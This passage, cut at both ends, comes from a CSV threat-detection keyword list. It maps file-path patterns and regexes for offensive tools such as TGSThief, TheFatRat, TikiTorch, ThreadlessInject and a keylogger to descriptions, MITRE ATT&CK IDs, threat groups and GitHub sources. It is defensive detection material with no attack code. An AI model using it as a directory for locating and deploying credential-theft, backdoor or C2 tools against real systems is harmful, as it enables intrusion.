Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*/TFG/src/helpers/execve_hijack*",".{0,1000}\/TFG\/src\/helpers\/execve_hijack.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*/tftp-enum.nse*",".{0,1000}\/tftp\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/TGSThief.git*",".{0,1000}\/TGSThief\.git.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","146","22","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" "*/TGSThief/*",".{0,1000}\/TGSThief\/.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","146","22","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" "*/tgtParse.py*",".{0,1000}\/tgtParse\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*/tgtParse/tgtParse.*",".{0,1000}\/tgtParse\/tgtParse\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*/thc-hydra/*",".{0,1000}\/thc\-hydra\/.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*/the-backdoor-factory.git*",".{0,1000}\/the\-backdoor\-factory\.git.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "*/TheFatRat*",".{0,1000}\/TheFatRat.{0,1000}","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8922","2233","2024-03-17T12:09:38Z","2016-07-24T10:30:19Z" "*/theHarvester.py*",".{0,1000}\/theHarvester\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/theHarvester.py*",".{0,1000}\/theHarvester\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/theHarvester.py*",".{0,1000}\/theHarvester\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/Theif.dll*",".{0,1000}\/Theif\.dll.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*/ThemeBleed.exe*",".{0,1000}\/ThemeBleed\.exe.{0,1000}","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","179","37","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" "*/thief.py*",".{0,1000}\/thief\.py.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*/thirdparty/msf/*",".{0,1000}\/thirdparty\/msf\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/ThisIsNotRat.git*",".{0,1000}\/ThisIsNotRat\.git.{0,1000}","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","1","N/A","9","10","61","20","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" "*/thoth.git*",".{0,1000}\/thoth\.git.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*/thread-injector.exe*",".{0,1000}\/thread\-injector\.exe.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*/ThreadlessInject.git*",".{0,1000}\/ThreadlessInject\.git.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","7","661","76","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" "*/Thread-Pool-Injection-PoC.git*",".{0,1000}\/Thread\-Pool\-Injection\-PoC\.git.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","1","N/A","8","1","70","9","2024-02-11T18:45:31Z","2024-01-24T07:42:08Z" "*/ThreatCheck.git*",".{0,1000}\/ThreatCheck\.git.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*/Throwback.git*",".{0,1000}\/Throwback\.git.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*/ThrowbackDLL/*",".{0,1000}\/ThrowbackDLL\/.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*/ThunderDNS*",".{0,1000}\/ThunderDNS.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","404","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" "*/ticket_converter.py*",".{0,1000}\/ticket_converter\.py.{0,1000}","offensive_tool_keyword","ticket_converter","A little tool to convert ccache tickets into kirbi (KRB-CRED) and vice versa based on impacket.","T1558.003 - T1110.004","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/zer1t0/ticket_converter","1","1","N/A","10","2","163","31","2022-06-16T19:38:05Z","2019-05-14T04:48:19Z" "*/ticketConverter.exe*",".{0,1000}\/ticketConverter\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*/ticketConverter.py*",".{0,1000}\/ticketConverter\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/ticketer.py -*",".{0,1000}\/ticketer\.py\s\-.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*/ticketer.py*",".{0,1000}\/ticketer\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/ticketer.py*",".{0,1000}\/ticketer\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*/ticketsplease.py*",".{0,1000}\/ticketsplease\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*/TikiLoader/*",".{0,1000}\/TikiLoader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*/TikiSpawn.*",".{0,1000}\/TikiSpawn\..{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*/TikiSpawn/*",".{0,1000}\/TikiSpawn\/.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*/timeoutpwn64*",".{0,1000}\/timeoutpwn64.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/timestomp.py*",".{0,1000}\/timestomp\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/timestomping.ps1*",".{0,1000}\/timestomping\.ps1.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*/timwr/CVE-2016-5195*",".{0,1000}\/timwr\/CVE\-2016\-5195.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","10","942","392","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" "*/tinar.py*",".{0,1000}\/tinar\.py.{0,1000}","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","0","N/A","9","10","61","20","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" "*/tls-alpn.nse*",".{0,1000}\/tls\-alpn\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tls-nextprotoneg.nse*",".{0,1000}\/tls\-nextprotoneg\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tls-ticketbleed.nse*",".{0,1000}\/tls\-ticketbleed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tmmmp *",".{0,1000}\/tmmmp\s.{0,1000}","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*/tmp/*-passwords.txt*",".{0,1000}\/tmp\/.{0,1000}\-passwords\.txt.{0,1000}","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","0","N/A","N/A","10","5272","667","2024-04-29T16:57:49Z","2021-01-01T19:02:36Z" "*/tmp/*-usernames.txt*",".{0,1000}\/tmp\/.{0,1000}\-usernames\.txt.{0,1000}","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","0","N/A","N/A","10","5272","667","2024-04-29T16:57:49Z","2021-01-01T19:02:36Z" "*/tmp/.manspider*",".{0,1000}\/tmp\/\.manspider.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*/tmp/amass.zip*",".{0,1000}\/tmp\/amass\.zip.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*/tmp/bin/csprecon*",".{0,1000}\/tmp\/bin\/csprecon.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*/tmp/bin/subfinder*",".{0,1000}\/tmp\/bin\/subfinder.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*/tmp/borg_d3monized*",".{0,1000}\/tmp\/borg_d3monized.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*/tmp/c2-rebind.so*",".{0,1000}\/tmp\/c2\-rebind\.so.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - 